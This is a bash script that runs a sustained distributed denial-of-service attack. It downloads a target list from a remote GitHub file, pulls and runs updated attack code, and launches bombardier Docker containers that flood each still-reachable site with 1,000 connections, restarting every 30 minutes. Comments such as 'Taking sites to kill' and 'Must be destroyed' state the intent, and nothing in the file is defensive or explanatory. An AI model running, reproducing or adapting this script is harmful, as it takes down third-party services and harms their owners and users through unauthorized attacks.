#!/bin/bash
# Configuration of Bombardier

BOMBARDIER_TIMEOUT=600000s

BOMBARDIER_CONNECTIONS=1000



while :
do
  # Taking sites to kill
  declare -a sites=($(curl https://raw.githubusercontent.com/alexnest-ua/attacker/main/targets ))
  # Update bomb (take last version from git
  cd ~/Updated-bombardier 
	num=$(sudo git pull origin main| grep -c "Already")
	echo "$num"
  
	if ((num == 1));
	then
		echo -e "Running old(up to date) bombardier"
	else
		cp ~/Updated-bombardier/bombardier ~
		cd ~
		echo "Running new bombardier"
		./bombardier
	fi
    
    
  echo "Kill all useless containers"

  sudo docker kill $(sudo docker ps -aqf ancestor=alpine/bombardier)

  echo "Docker useless containers killed"

  echo "Run ddos for all sites"
  for site in "${sites[@]}"; do
  
    status_code=$(curl -m 2 -o /dev/null -s -w "%{http_code}\n" "$site")
  
    status_code=$(expr "$status_code" + 0)
  
  
  
    # If status code is zero site is already blocked
  
  
  
    site_status="${site} status code ${status_code}"
  
    echo "$site_status"
  
    if (("$status_code" != 0 && "$status_code" <= 500)); then
  
      echo "Must be destroyed"

      sudo docker run -ti -d --rm alpine/bombardier -c "$BOMBARDIER_CONNECTIONS" -d "$BOMBARDIER_TIMEOUT" -l "$site"
  
    fi
  
  done

  echo "DDoS is up and running..."

  sleep 30m

  echo "Restarting DDoS, checking which sites are still working"
done
